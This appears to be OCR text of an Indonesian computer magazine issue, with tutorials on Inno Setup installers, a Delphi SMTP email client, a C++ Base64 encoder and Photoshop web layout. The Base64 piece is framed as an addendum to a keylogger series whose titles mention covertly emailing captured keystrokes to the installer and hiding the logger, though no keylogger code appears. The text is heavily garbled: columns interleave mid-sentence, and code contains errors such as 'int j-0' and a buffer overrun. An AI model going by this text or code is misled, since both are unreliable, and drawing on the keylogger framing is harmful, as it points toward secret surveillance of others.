isetup-3.0.7.exe (921 KB). Install
Perlu digarisbawahi perangkat tersebut ke komputer
lagi, perangkat ini Anda. Ikuti saja wizard yang telah
disediakan.
Gambar 10 dan 11. tersedia sebagai
freeware. Lebih
Uji Coba hebohnya lagi,
Jordan Russell ber-
Selesai sudah proyek anda, silakan anda uji untuk melihat baik hati memper-
hasilnya... Tekan tombol F5 pada keyboard kurang lebih silakan siapa saja
hasilnya seperti yang terlihat pada Gambar 12: untuk memperoleh
kode sumber dari
Inno Setup yang
dalam bahasa Delphi.
Kita akan membuat
installer untuk pro-
gram Tweakid.exe
yang pernah dibahas
pada NeoTek III/8.
File lain yang dibu-
tuhkan dalam simu- MULAI MEMBUAT INSTALLER
lasi ini adalah file
License.txt dan file
2 Jalankan Inno Setup 3 yang telah
terinstal. Pada kotak dialog
Welcome, pilih opsi Create a new
General.txt yang ada script file using the Script Wizard,
di folder Windows. tekan tombol OK. Akan tampil
Ketiganya hanya jendela Inno Setup Script Wizard,
sebagai contoh, anda tekan saja tombol Next.
ganti dengan file
Gambar 12. lain yang anda buat.

38 NeoTek Vol. IV No. 05


NeoTutor

APPLICATION INFORMATION APPLICATION DIRECTORY APPLICATION FILES


3 Pada jendela ini lengkapi dengan
data-data aplikasi Anda. Misalnya
4 Selanjutnya, isikan dengan
Program Files directory pada
5 Di jendela ini, tekan tombol
Browse dan tentukan file exe
Tweakid; Tweakid versi 1.0; Neotek, Application destination base yang bersangkutan. Dalam hal ini
Tbk; dan http://www.neotek.co.id; directory, dan Neotek\Tweakid dipilih file Tweakid.exe. Bila ada
untuk data Application name pada kotak Application directory file lain yang ingin ditambahkan
sampai Application website. name. Biarkan isian yang lainnya tekan tombol Add file(s).
dan tekan tombol Next. Tambahkan file License.txt dan
General.txt dari C:\Windows

APPLICATION ICON APPLICATION DOCUMENTATION COMPILE AND SAVE


6 Berikutnya, isikan dengan
Neotek\Tweakid pada kotak
7 Pada tahap selanjutnya, tentukan
file license yang akan dimasuk-
8 Semuanya telah siap. Tekan tom-
bol Finish. Tekan tombol Yes pada
Application Start Menu folder name. kan dan juga file-file lain yang kotak dialog Inno Setup Compiler.
Beri tanda check pada opsi Allow akan ditampilkan sebelum dan Inno Setup akan membuatkan
user to change start menu folder sesudah instalasi. Lanjutkan script untuk Anda. Tekan lagi Yes
name, Create Unistall icon… , dan dengan menekan tombol Next. untuk menyimpannya. Kemudian
Allow user to create a desktop icon. tunggulah proses kompilasinya
beberapa saat.

RUN OUTPUT AYO DICOBA


9 Untuk mencoba melakukan
pengetesan instalasi, klik menu
10 File installer untuk tweakid
akhirnya berhasil dibuat. Installer
11 Cobalah klik ganda file setup.exe
tersebut. Lakukan instalasi pro-
Run > Run, atau dengan menekan ini berada di folder Output gram Tweakid ini pada komputer
tombol keyboard F9. dengan nama setup.exe. Hanya Anda. Hasilnya Tweakid.exe akan
satu file instalasi saja yang dapat terinstal di komputer, dan dibuat-
Anda distribusikan/copy-kan ke kan shortcut pada Start Menu,
komputer yang lain. Desktop, dan juga dibuatkan pe-
rangkat uninstall-nya.

Vol. IV No. 05 NeoTek 39


NeoTutor

D E LP H I WO R KS H O P
Cyber Merpati Email Client
Ada beberapa cara membuat email client sendiri. Selain menggunakan Visual Basic pada
artikel-artikel sebelumnya, dapat juga menggunakan Delphi 7.
Happy Candraleka (cakrabirawa@mail.ru) membahasnya untuk anda.
MAIL MERUPAKAN SALAH SATU LAYANAN INTERNET YANG Perancangan Antarmuka Cyber Merpati
E paling tua dan paling banyak digunakan. Umum-
nya seorang user dapat mengirimkan email dengan
Penulis menganggap bahwa Borland Delphi 7 telah ter-
instal pada komputer anda. Sebagai tahap pertama anda
dua cara, yaitu melalui website yang menyediakan layanan akan merancang tampilan aplikasi Cyber Merpati. Peran-
email berbasis web atau dengan menggunakan program cangan antarmuka/tampilan merupakan hal yang paling
email client. Untuk program email client ini, yang paling
awal dilakukan dalam rangkaian pemrograman berbasis
banyak dan populer digunakan adalah Outlook Express GUI (Graphical User Interface). Berdasarkan tabel berikut
buah karya Microsoft. ini tempatkan beberapa komponen pada bidang Form1.
Tanpa bermaksud untuk menandingi Microsoft, kiranya perlu
juga pembaca membuat program sederhana yang dapat ber- Tabel 1.
fungsi untuk mengirimkan email. Meski sederhana tetapi Komponen Tempat di Component Pallete Jumlah
akan terdapat rasa puas karena Anda sendiri dapat membuat TLabel Pallete Standard 9
aplikasi untuk mengirim email. Terlebih lagi karya Anda TEdit Pallete Standard 6
tersebut adalah legal, ketimbang memakai Outlook Express TMemo Pallete Standard 1
tetapi hasil bajakan. TPanel Pallete Standard 1
Pada bahasan ini Anda akan penulis bimbing untuk mem- TButton Pallete Standard 4
TIdMessage Pallete Indy Misc 1
buat sebuah aplikasi sederhana untuk mengirim email TIdSMTP Pallete Indy Clients 1
layaknya sebuah email client. Bahasa dan compiler yang
digunakan adalah Borland Delphi 7, yang merupakan versi
Delphi yang terkini. Pada versi Delphi ini terdapat kompo- Selanjutnya Anda dapat mengatur tata letak komponen-
nen Indy versi 9.00.10 yang merupakan inti dalam aplikasi komponen tersebut seperti terlihat pada Gambar 2. Anda
yang akan kita buat ini. Kita namakan saja aplikasi kita ini dapat mengklik dan men-drag satu komponen dan memin-
dengan Cyber Merpati, untuk menghargai burung merpati dahkannya ke posisi yang lain. Perhatikan saja Gambar 2.
atas jasanya sebagai pengirim surat di masa susah dulu.
Gambar 2. Tata
letak komponen-
Menjalankan Borland Delphi 7 komponen.

Pengubahan Properti Komponen


Perancangan antar muka hampir selesai. Sekarang waktu-
nya untuk mengubah properti komponen-komponen yang
digunakan dalam program agar bekerja sesuai dengan
kebutuhan kita.
Gambar 1. Bidang kerja IDE Delphi 7.
Caranya mudah saja. Klik satu komponen pada bidang
Form1 dan ubah propertinya pada Object Inspector yang
Tutorial ini penulis sajikan semudah mungkin, sehingga ada di sebelah kiri IDE Delphi.
bagi Anda yang tidak mempunyai pengalaman mempro- Tabel 2 ini dapat digunakan sebagai acuan pengubahan
gram dengan Delphi sekalipun dapat menerapkannya properti komponen.
secara mudah. Untuk komponen Edit1 sampai Edit6, kosongkan properti
Jangan takut dengan Delphi. Berikut dijelaskan langkah- Text masing-masing. Pengubahan properti komponen
langkah pembuatan sebagai panduan anda. selesai. Tampilannya sekarang terlihat seperti Gambar 3.

40 NeoTek Vol. IV No. 05


NeoTutor

Tabel 2 Hal yang sama juga pada komponen Button4. Kode yang
ditambahkan adalah
Komponen Properti Nilai
Close;
Label1 Caption Host
Label2 Caption User Name Sekarang klik pada komponen IdSMTP1. Pada Object
Label3 Caption Password Inspector pilih tab Event. Klik ganda pada Event
Label4 Caption From OnConnected. Tambahkan kode sederhana ini.
Label5 Caption To
Label6 Caption Subject Label9.Caption := 'Hey.., already connected';
Label7 Caption Body
Label8 Caption Status Lakukan juga pada Event OnDisconnected. Tambahkan
Label9 Caption kode ini
Panel1 Caption Label9.Caption := 'Disconnected. Sayoonaraa';
Height 3
Width 421 Sampai di sini segala sesuatunya selesai. Anda tinggal meng-
Button1 Caption Connect compile-nya untuk menjalankan program Cyber Merpati.
Button2 Caption Send Pilih menu Run > Run, atau dengan menekan tombol F9
Button3 Caption Disconnect pada keyboard. Borland Delphi 7 akan menghasilkan file
Button4 Caption Close executable yang siap dijalankan di komputer lain tanpa
Memo1 Height 185 perlu meng-install Delphi di mesin sasaran.
Width 417
Form1 Caption Cyber Merpati Contoh penggunaannya akan penulis paparkan di sini.
Misal Anda mempunyai email account saya@yahoo.com.sg
Gambar 3. akan mengirim email ke tujuan@dimana.co.id. Isikan pada
Tampilan Cyber bagian Host dengan smtp.yahoo.com.sg (host name email
Merpati. anda), User Name dengan saya, password dengan password
anda sendiri, di kotak From isikan dengan email Anda
saya@yahoo.com.sg, dst.
Lanjutkan dengan menekan tombol Connect sampai status
menampilkan Hey.., already connected. Ikuti dengan me-
nekan tombol Send. Bila pengiriman berhasil, maka status
akan menampilkan Message sent successfully.

Ingin Lebih dari Outlook Express


Outlook Express memang menjadi pilihan banyak pengguna
komputer untuk urusan keluar masuk email. Salah satu
Penambahan Kode Program alasannya diantaranya adalah segala kebutuhan fitur-
fiturnya telah cukup dan telah disediakan oleh Oulook
Inilah bagian inti dari pembuatan aplikasi ini. Anda dapat Express. Tetapi Oulook Express ini tidak memberikan apa
dengan mudah mengikutinya. Pertama, klik ganda pada yang penulis inginkan karena keterbatasan untuk dapat
komponen Button1, yaitu komponen yang bertuliskan mengubah-ubah setting.
Connect. Isikan kode program ini pada bidang Code Editor
yang tampil diantara blok begin dan end;. Inilah yang mendasari penulis membuat Pak Pos v2.1.2.
Meski hanya digunakan untuk mengirim email, tetapi
with IdMessage1 do program ini mempunyai kelebihan dibanding OE, yaitu
begin
Body.Assign(Memo1.Lines); banyaknya parameter atau variable yang dapat diubah user
From.Text := Edit4.Text; sebelum mengirim email. Diantaranya adalah Helo Name,
Recipients.EMailAddresses := edit5.Text; X-Mailer, Date, Extra Header, Priority, Reply To, Receipt
Subject := edit6.Text; Recepient, dan pengubahan header yang lain. Ini semua
Priority := mpNormal;
end; penulis buat dengan dasar pembahasan di atas. Anda pun
dapat juga membuatnya. Dapatkan aplikasi berikut kode
with IdSMTP1 do program Cyber Merpati yang dibahas di sini, serta aplikasi
begin
Host := Edit1.Text;
Pak Pos v2.1.2. di CD NeoTek bulan ini. Sayoonaraa.
Username := Edit2.Text; Gambar 4.
Password := Edit3.Text; Aplikasi Pak
AuthenticationType := atLogin; Pos v2.1.2.
Connect;
end;

Klik ganda lagi pada komponen Button2 yang bertuliskan


Send. Isikan kode program ini pada Code Editor.
try
IdSMTP1.Send(IdMessage1);
finally
Label9.Caption := 'Message sent successfully';
end;

Klik ganda pada komponen Button3 yang bertuliskan


Disconnect. Tambahkan kode program ini diantara blok
begin dan end; .
IdSMTP1.Disconnect;

Vol. IV No. 05 NeoTek 41


NeoTutor

C++ WO R KS H O P
Pengkodean Base64
Dewanata (m_strdewanata@yahoo.com) menjayikan pengodean Base64
sebagai pelengkap rangkaian artikel keylogger yang telah selesai dimuat
sejak NeoTek III/8 sampai dengan NeoTek IV/4
ASE64 ADALAH STANDAR PENGKODEAN (ENCODING) YANG 3. Pengelompokan
B umum dijumpai di Internet. Walaupun Base64 ka-
dang juga disebut sebagai salah satu tipe enkripsi
Mengelompokan rangkaian binari menjadi beberapa kelom-
pok yang masing-masing berisikan enam karakter binari.
Base64 encryption), metode ini sebenarnya tidak melaku-
(B Contoh kita akan menjadi: 010011 000100 100101 000001
kan proses enkripsi data. Base64 adalah suatu standar atau
metode yang digunakan untuk merepresentasikan data da- 4. Ubah ke desimal
lam format tertentu. Sebagai analogi, anda dapat memban-
dingkannya dengan format sistem bilangan binari, heksa, Melakukan proses konversi masing-masing kelompok bi-
atau yang lainnya. nary yang dihasilkan oleh langkah sebelumnya ke angka
desimal.
Salah satu contoh pengunaan pengkodean ini adalah dalam
pengiriman data SMTP (pengiriman email). Di proses Untuk contoh kita:
tersebut, ada kalanya server SMTP mewajibkan pengirim ter- 010011 → 19
otentikasi sebelum melakukan pengiriman email. Untuk itu, 000100 → 4
username dan password si pengirim harus dikirimkan ke 100101 → 37
server. Data tersebut bisa dikirimkan dalam berbagai format, 000001 →' 1
tergantung permintaan server. Namun pada umumnya
format pengkodean yang digunakan adalah Base64. 5. Ubah ke karakter
Merepresentasikan setiap desimal ke karakter yang terbaca
Proses Pengkodean (readable characters).
Langkah-langkah dasar dalam proses pengkodean: Untuk itu digunakan array karakter Base64 sebagai berikut:
1. Ubah ke desimal ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnop
2. Ubah ke binari qrstuvwxyz0123456789+/
3. Pengelompokan
4. Ubah ke desimal Pencarian karakter yang mewakili angka desimal kita ada-
5. Ubah ke karakter lah berdasarkan indeksnya.
Untuk menjelaskan proses di atas, ada baiknya kita lang- Terlihat bahwa array tersebut akan dapat mewakili setiap
sung mencoba melakukan proses pengkodean langkah demi nilai desimal yang dihasilkan oleh langkah sebelumnya ka-
langkah, dengan menggunakan satu contoh. Untuk mudah- rena cakupan nilai desimal langkah empat adalah 0 (binary
nya, mari kita jadikan string LIA sebagai contoh string 000000) s/d 63 (binary 111111).
yang akan dikodekan menggunakan metode ini. Untuk contoh kita, konversi akan menghasilkan string TElB.
1. Ubah ke desimal 19 → T
4 → E
Proses untuk mengonversi setiap karakter string menjadi 37 → l
representasi angka desimal. Jika menggunakan C++, maka 1 → B
konversi ini dapat dilakukan dengan memanggil fungsi
int(c), dengan c adalah karakter yang akan dikonversi. Demikian, telah dijelaskan langkah-langkah utama dalam
proses pengkodean Base64.
Contoh:
L → 76 Di bawah ini akan dijelaskan satu proses tambahan yang
I → 73 dapat terjadi akibat sifat pengelompokan string binary men-
A → 65 jadi enam karakter binary, yang dilakukan di langkah tiga.

2. Ubah ke binary Padding


Proses konversi setiap desimal menjadi binary. Ada kasus khusus dimana kita perlu menambahkan bebe-
rapa karakter dummy di akhir string kita.
Contoh:
76 → 01001100 Jika anda perhatikan contoh sebelumnya, terutama pada
73 → 01001001 langkah ketiga, akan terlihat bahwa prosedur pengelom-
65 → 01000001 pokan tersebut hanya berlaku untuk string dengan panjang
karakter habis dibagi tiga. Untuk yang tidak habis, maka
Pada akhir langkah dua, akan dihasilkan satu rangkaian ka- proses pengelompokan akan gagal.
rakter binary.
Untuk lebih jelasnya, mari kita hilangkan karakter terakhir
Untuk contoh kita, output langkah ini adalah dari string contoh kita sebelumnya, dari LIA menjadi LI.
010011000100100101000001 Terlihat bahwa panjang string LI adalah 2, tidak habis
dibagi 3.
42 NeoTek Vol. IV No. 05
NeoTutor

Setelah langkah dua dijalankan output yang dihasilkan ada- CBase64Coder() dan ~CBase64Coder() adalah constructor dan
lah 0100110001001001. destructor class ini.
Fungsi SetPlainChar() adalah fungsi untuk memasukkan string
Ketika dilakukan langkah ketiga, maka output-nya adalah yang akan dikodekan.
010011 000100 1001.
Fungsi Encode() adalah fungsi untuk memulai proses pengkodean.
Terlihat bahwa kelompok terakhir (1001) akan kurang dari Fungsi GetCodedChar() adalah fungsi untuk mendapatkan string
enam karakter binari. hasil pengkodean.
Untuk menghindari hal tersebut, maka kita perlu melaku- Private member:
kan padding dengan langkah-langkah sebagai berikut: Variabel npad digunakan untuk menyimpan informasi banyak-
nya padding yang diperlukan.
1. Tambahkan binari 0 sehingga jumlah karakter menjadi
plain_char adalah variabel yang menyimpan string sebelum
habis dibagi tiga. dikodekan.
Mari kita terapkan di contoh di atas. Pada string LI, pan- coded_char digunakan untuk menyimpan string yang telah
jang string adalah 2. Agar habis dibagi tiga, maka perlu dikodekan.
ditambahkan 1 (satu) karakter tambahan, atau 8 (delapan) basis_64 adalah string Base64 yang digunakan untuk mengonversi
karakter binari 0 tambahan. Lihat implementasinya di desimal ke karakter.
bawah ini. bin_to_six_char() fungsi untuk mengelompokkan rangkaian
binary menjadi per enam karakter binary.
01001100 01001001 00000000
bin_to_dec() fungsi untuk mengonversi string binary menjadi
Keterangan: desimal.
String binari pertama adalah representasi binari dari 'L' char_to_bin() fungsi untuk mengonversi string karakter ASCII
String binari kedua adalah representasi binari dari 'I' menjadi string binary.
String binari ketiga (bergarisbawah) adalah tambahan yang dec_to_bin() fungsi untuk konversi desimal ke format binary.
dimaksud.
Berikut ini (List 2) adalah implementasi class kita. Perhati-
2. Lanjutkan ke langkah selanjutnya. kan bahwa antisipisi kemungkinan penggunaan padding
telah dimulai sejak awal pada fungsi SetPlainChar(). Penam-
Yaitu Langkah 4: Ubah ke desimal dan Langkah 5: Ubah ke bahan padding itu sendiri dilakukan di fungsi char_to_bin().
karakter. Akan dihasilkan output akhir sebagai berikut:
TEkA. Perhatikan, karakter A di akhir output adalah hasil // Base64Coder.cpp
// By Dewanata m_strdewanata@yahoo.com
dari proses padding.
3. Ganti karakter padding CBase64Coder::CBase64Coder()
{
Sesuai dengan jumlah karakter tambahan, ganti karakter A npad=0;
yang dihasilkan akibat proses padding menjadi =. Untuk basis_64 = new char[65];
contoh kita: TEkA akan menjadi TEk= strcpy(basis_64,
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/");
Pemrograman
Setelah menguasai teori, mari kita mengimplementasikan- //
nya ke sebuah program. Seperti biasa, sebaiknya data dan 0123456789012345678901234567890123456789012345678901234567890123
fungsi dikapsulasi ke dalam satu class. Fungsi-fungsi yang }
diekspos ke publik adalah sekedar fungsi get/set. Untuk
artikel ini, penulis telah membuat satu class sebagai contoh CBase64Coder::~CBase64Coder()
implementasi. Contoh ini dibuat sesederhana mungkin {
dengan lebih menekankan pada penjelasan teori. Source delete [] basis_64;
code lengkap disertakan dalam CD NeoTek kali ini. delete [] coded_char;
delete [] plain_char;
Perhatikan prototipe class pada List 1. }
Public member: // decimal to binary '01'
char * CBase64Coder::dec_to_bin(int dec_in)
{
// Base64Coder.h char * cbin = new char[8+1];
memset(cbin,0,8+1);
class CBase64Coder
{
int dec_step;
public:
CBase64Coder () ; for(int i=0; i<8; i++){
virtual ~CBase64Coder () ; dec_step = pow(2,8-i-1);
void SetPlainChar(char * c); if(dec_in>=dec_step){
void Encode(); cbin[i] = '1';
char * GetCodedChar(); dec_in -=dec_step;
} else
private: cbin[i] = '0';
int npad; }
char * plain_char; return cbin;
char * coded_char; }
char * basis_64;
char * bin_to_six_char(char * bin_in); // string to binary '01'
int bin_to_dec(char * bin_in); // 'Hello' will be '0100100001100101011011000110110001101111' BEFORE PADDING
char * char_to_bin(char * char_in); char * CBase64Coder::char_to_bin(char *char_in)
char * dec_to_bin(int dec_in); {
}; int clen = strlen(char_in);
List 1 char * partchar = new char[8+1];

Vol. IV No. 05 NeoTek 43


NeoTutor

char * retchar = new char[8*clen+1]; if(npad!=0) npad=3-npad;


memset(retchar,0,8*clen+1); }

for(int i=0; i<clen; i++){ // start the encoding process


partchar = dec_to_bin(int(char_in[i])); void CBase64Coder::Encode()
strcat(retchar, partchar); {
}
char * c = bin_to_six_char(char_to_bin(plain_char));
// add padding characters coded_char = new char[strlen(c)+1];
char pad_char[] = "00000000"; strcpy(coded_char, c);
for(i=0; i<npad; i++){ }
strcat(retchar, pad_char);
} char * CBase64Coder::GetCodedChar()
{
delete [] partchar; return coded_char;
return retchar; }

} List 3 menunjukkan contoh implementasi class yang baru


kita buat tadi, sedangkan Gambar 1 menunjukkan output
// binary to decimal
// '010010' will be 18
program tersebut.
int CBase64Coder::bin_to_dec(char *bin_in)
{ #include "stdafx.h"
int i=0; #include "Base64Coder.h"
int result=0; #include <string.h>
int len=strlen(bin_in);
int main(int argc, char* argv[])
while(bin_in[i]){ {
if(bin_in[i]=='1') result+=pow(2,len-i-1); printf("BASE64 ENCODER\n\n");
i++;
} char * plain_char = "LI";
return result; printf("plain: %s\n", plain_char);

} CBase64Coder cbase;
cbase.SetPlainChar(plain_char);
char * CBase64Coder::bin_to_six_char(char *bin_in) cbase.Encode();
{
printf("coded: %s\n\n\n",cbase.GetCodedChar());
int i=0; return 0;
int j-0 } List 3
int k=0;
int len=strlen(bin_in);
int len2=len/6 + 1;

char * result = new char[len2+1];


memset(result,0,len2+1);
char * chtemp = new char[6];

while(i<len){
memset(chtemp,0,6+1);
while(bin_in[i] && j<6){
chtemp[j]=bin_in[i];
j++;
i++;

} Gambar 1.
int m=bin_to_dec(chtemp);
result[k] = basis_64[m];
j=0;
k++; Rangkaian Artikel Keylogger
} Artikel ini merupakan rangkaian artikel tentang pembu-
atan keylogger yang dimuat di nomor-nomor NeoTek sbb:
// replace all paddings to '='
for(i=0; i<npad; i++) result[len2-i-2]='='; C++ Workshop: Membuat Sendiri Keylogger
NeoTek III/8
delete [] chtemp; Keylogger v. 2.0: Modifikasi srv32.exe dan srv32.dll
return result; NeoTek III/12
} Hasil Intersepsi Keylogger Dikirim Otomatis ke Pemasang
NeoTek IV/1
void CBase64Coder::SetPlainChar(char *c) SMTP untuk Keylogger: Menggunakan Subscribed SMTP
{ NeoTek IV/2
plain_char = new char[strlen(c)+1]; SMTP untuk Keylogger: Mampu Mengirim Attachment
strcpy(plain_char, c); NeoTek IV/3
Keylogger dengan Kemampuan Kamuflase
// calculate padding NeoTek IV/4
int len=strlen(plain_char); Addendum untuk Keylogger: Format Base64
npad=len%3; NeoTek IV/5

44 NeoTek Vol. IV No. 05


NeoStyle

G R AP H I CAL WE B D E S I G N (1)
Mendayagunakan Photoshop
thc_oi@neoteker.or.id membahas suatu proyek web design menggunakan Photoshop,
Image Ready, dan Dreamweaver yang disajikan secara berseri. Pada bagian pertama ini
dibahas pembentukan halaman web menggunakan Photoshop.

mudahan memberi dasar bagi anda untuk dapat membuat


P
HOTOSOP LEBIH DIKENAL SEBAGAI PENGOLAH FOTO DAN
software untuk image manipulation/retouching. situs web dengan PhotoShop dan ImageReady yang jauh
Tapi jangan tertipu hanya dengan namanya, yaitu lebih bagus dari contoh yang saya berikan.
PhotoShop, sebab software pintar ini dapat digunakan untuk Sebelum mempraktekkan tutorialnya, Gambar 1 menun-
membuat situs web. Banyak situs web yang sekarang meng- jukkan hasil akhir tutorial ini.
gunakan photoshop, mulai dari pembuatan image sampai
membuat layout-nya.
Dalam hal ini tentu saja PhotoShop hanya bisa membuat
tampilan halaman web saja, dan bukan untuk mengolah/
membuat script yang dinamis (kalau PS bisa untuk scripting,
software lain bisa gigit jari dong) .
Tapi terlepas dari kelemahannya, PhotoShop sangat ampuh
untuk digunakan sebagai image editor, baik untuk desain
web ataupun desain grafis.
Berikut tahapan singkat dari pembuatan suatu situs web:
1. Perencanaan (layout)
2. Pembuatan image (isi dari layout)
3. Pengisian halaman
4. Upload
5. Perawatan/Maintenance
Di sini saya coba mencoba memberikan panduan yang sing-
kat, mudah, dan sederhana untuk membuat suatu situs web.
Mungkin hasilnya nanti menurut anda kurang bagus saya
minta maaf, tapi apa yang saya akan berikan mudah- Gambar 1. Hasil akhir tutorial ini.

Tahap 1A: Pembuatan Layout dan Header

untuk header

content

link

JALANKAN PHOTOSHOP MEMBUAT LAYOUT MEMBUAT HEADER


1 File > New untuk ukuran, isi width
790 dan height 600 (ukuran ini
2 Dalam membuat layout anda da-
pat dibantu oleh ruler, dalam
3 Buat teks Neoteker sebagai judul.

dipilih agar nantinya pengunjung menampilkannya. Bentuk sebuah Caranya klik ikon
yang masih memakai resolusi garis (guide) sebagai pembentuk lalu tempatkan di bidang gambar
monitor 800x600 masih bisa me- layout dengan cara menariknya yang diinginkan (sesuai layout).
nikmati web anda dengan nyaman), dari ruler ke bidang gambar. Pada
mode RGB. Tapi nanti anda bisa tahap ini kita akan membuat Seleksi dengan klik ikon
mengubah ukuran sesuka hati, header ,link, dan frame untuk dari pojok kiri atas sampai pojok
asal memberikan keterangan, content. kanan bawah guide horizontal
misalnya best view @ 1024x768. kedua dari atas.

Vol. IV No. 05 NeoTek 45


NeoStyle

BACKGROUND LOGO MANIPULASI BACKGROUND MEMBERI WARNA BACKGROUND


4 Di bawah text layer Neoteker yang
tadi kita buat akan kita tempat-
5 Kemudian terhadap layer itu:
Filter > render > clouds
6 Masih di layer yang sama, tekan
Ctrl+U. Tick Colorize, lalu ubah
kan background berupa layer Filter > noise> addnoise (17 %) nilai Hue menjadi 205, Saturation
tersendiri. Caranya klik icon New Filter > blur > motion blur 99, dan Ligthness -7. Jika anda
Layer yang pada layer palette, (00 , 80 pixel) ingin bereksperimen dengan
kemudian drag layer baru ter- Filter > Texture > patchwork warna silahkan ubah nilai-nilai
sebut ke bawah layer teks. (square size 2, relief 19) tersebut sesuka hati. Disini akan
Hasilnya akan terlihat pada terjadi perubahan warna.
gambar.

Hasil akhir
header

EFEK GRADASI
7 Supaya background yang dibuat ti-
dak terlihat kaku, maka perhalus
dengan memberi efek gradasi.
Caranya klik Add layer mask
pada layer pallete. Tekan tombol D
lalu X. Kemudian pilih gradient tool
Pada properties gradient tool pilih Tulisan Neoteker akan kita beri efek Kemudian klik Gradient color-nya.
opsi linear gradient, mode normal,
opacity 100%, dan tick semua opsi
(reverse, dither, transparency), sambil
8 agar lebih indah. Kembali bekerja
di layer teks Neoteker dengan cara 9 Atur dengan cara menggeser poin
warna putih yang berada di kanan
memilihnya di layer pallete. Kemu- bawah ke kiri.
menekan Shift kemudian tarik kur- dian klik icon f di layer pallete. Pilih
sor mulai dari ¾ bagian bawah la- bevel dan emboss (size 2 , soften 0).
yer yang telah diberi efek sampai Tick drop shadow untuk memberi
ke guide line ke dua dari atas. Ha- effect bayangan. Tick gradient Hasil dari header yang telah kita
silnya akan terlihat di atas. overlay. Atur sudut menjadi -90. buat tampak pada gambar di atas.
Tahap 1B: Menu Link

Rata dengan
guide

MEMBUAT MENU LINK Caranya dengan double click Set 1 lalu ubah namanya. Layer set berfungsi menyim-
10 Pada tutorial ini, kita membuat
link antara lain: About me, Gallery,
11 pan layer-layer dalam satu folder. Mirip dengan folder biasa yang kita kenal berisi file-
file. Hanya saja sebuah layer set tidak bisa menampung layer set lagi, dan hanya bisa
menampung layer-layer. Dengan kata lain tidak ada sublayer set seperti halnya
Contact, Links, dan Download.
subfolder. Dengan Set 1 terseleksi seperti Gambar sebelumnya buat teks (size dan
Buat layer set baru (Create new font face sesuai selera anda) About me dan tempatkan di sebelah kiri. Otomatis layer
layer set) dengan mengklik baru yang kita buat akan berada di bawah layer set.
tombol yang ada di layer
pallete. Tempatkan layer set tsb Kemudian dengan Move Tool (hot key V) geser tulisan About me sejajar rata kiri
ke paling atas. Anda juga dapat dengan guide yang ada di kiri. Di sini akan terasa fungsi guide sebagai penolong, yai-
mengubah nama layerset agar tu salah satunya sebagai pembantu meratakan suatu objek.
mudah diketahui apa isinya.
Hasil sementaranya terlihat di atas.

46 NeoTek Vol. IV No. 05


NeoStyle

Klik panah ini


untuk menutup
layer set

MENU LINK YANG LAIN MEMBUAT LINK TAMPAK DINAMIS


12 Lakukan hal yang sama dalam membuat teks yang lain, yang
nantinya akan dibuat sebagai link. Sampai hasilnya seperti
13 Supaya link terlihat dinamis, ada baiknya mengguna-
kan hover link. Jadi bila mouse diletakkan di atas link
di atas. Sekarang ada baik nya anda menutup layer set de- itu, maka akan tampak tampilan yang lain. Untuk lebih
ngan meng-klik tombol panah kebawah. Tujuannya agar kita jelasnya, lihat gambar di atas. Jadi ketika mouse di
bisa mem-preview hasilnya. Jika ingin membuka kembali, dekatkan ke link, maka link tersebut akan berubah.
tinggal klik lagi pada tanda panah bawah tadi.

Untuk membuat tampilan seperti itu, lakukan Duplicate layer set. Masih pada set over, layer About me. Tekan Ctrl + U untuk
14 Caranya: klik kanan set yang ingin di-duplicate (dalam hal ini set
link) lalu beri nama over. Pastikan set over berada di bawah set
link. Bila belum berada di bawah set link, drag set over ke bawah
15 mengubah warnanya. Tick Colorize dan Preview agar an-
da bisa melihat preview nya. Lalu set Hue = 209,
Saturation = 100, dan Lightness = +41. Kemudian OK.
set link. Kemudian lihat isi dari set over. Pilih layer About me pada
set over. Kemudian Filter > Blur > Gausian Blur; akan muncul per-
tanyaan, jawab saja OK. Lalu masukkan nilai 4.8 pixel.

Lakukan hal yang sama pada layer yang lain yang ada di Yang efek itu yang kita buat tidak terlihat ketika normal
16 set over. Sehingga untuk sementara hasilnya akan terlihat
seperti gambar di atas. Kemudian buat layer set over 17 (tidak di-mouse over). Sampai di sini pembuatan over
link sudah siap, tapi belum selesai. Masih ada lagi bagai
menjadi invisible (tidak terlihat). Caranya klik lambang mata mana supaya menampil kan efek biru yang tadi muncul
yang ada di layer over. Hal ini dimaksudkan untuk ketika di over mouse. Nanti kita akan mengolahnya di
mengkondisikan link pada saat normal. Image Ready.

Vol. IV No. 05 NeoTek 47


NeoStyle

Sekarang kita akan membuat frame yang di dalamnya akan • Supaya frame tidak berbentuk sudut 90 derajat, halus-
18 berisi content dari halaman kita. Dalam frame ini juga bisa
kita bubuhkan background sebagai pemanis. Berikut langkah
langkahnya:
19 kan dengan Select > Modify > Smooth, isi 10 pixel, atau bila
ingin yang lebih bulat/halus isi dengan nilai yang lebih
besar. Klik OK.
• Buat Layer baru di luar layer set over dan link. Caranya pilih • Beri stroke/garis dengan Edit > Stroke, width = 3, location
layer Neoteker, lalu klik New layer. center. Lagi-lagi dua warna. Untuk masalah warna saya
• Buat seleksi sebesar layout yang kita buat dengan bantuan serahkan kepada anda, tetapi saran saya gunakan hitam,
guide dengan menggunakan selection tool gray, light gray, atau biru muda, agar serasi dengan war-
na yang ada. Setelah itu klik OK.

Tip
Untuk membuat backgroud, kita harus memperhatikan warna. Warna font yang akan kita
pakai dengan background harus berbeda tapi serasi supaya terlihat selaras. Jika kita
mau menggunkakan warna hitam untuk teks, maka warna background harus soft dan
cerah. Supaya teks dapat dibaca dengan nyaman.

LANGKAH-LANGKAH MEMBUAT BACKGROUND


21 • Buka file foto yang ingin kita jadikan sebagai back-
ground dengan cara File > Open
• Drag layer background pada file foto yang kita buka
tadi ke jendela web yang sedang kita kerjakan.
• Setelah itu akan tampak layer baru pada dokumen
web project kita.
• Foto ini terlihat terlalu besar, jadi kita akan mengecil-
kannya. Caranya cukup sederhana, hanya dengan me-
nekan Ctrl + t maka akan terjadi adjustment sepan-
jang foto, lalu kecilkan sampai mendapatkan ukuran
yang pas.
BACKGROUND UNTUK FRAME
20 Supaya lebih indah kita akan memberikan background
pada frame yang kita buat. Background ini bisa berasal
Tip
Tekan Shift ketika melakukan resize pada gambar, agar
dari mana saja. Bisa dari foto atau dari shapes yang anda gambar tetap proporsional tinggi dan lebarnya. Hindari
buat sendri. Kali ini kita akan menggunakan foto. Pada membesarkan foto atau gambar (berbasis pixel) karena
foto ini akan kita lakukan sedikit editing. Di atas adalah akan membuat foto/gambar itu menjadi pixelate.
contoh foto yang kita gunakan.

